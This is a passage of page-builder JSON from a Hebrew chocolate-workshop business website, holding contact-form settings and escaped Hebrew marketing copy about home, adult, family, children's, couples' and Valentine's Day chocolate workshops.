\\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"success_message_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea<\\/a> \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd <a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a> \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd 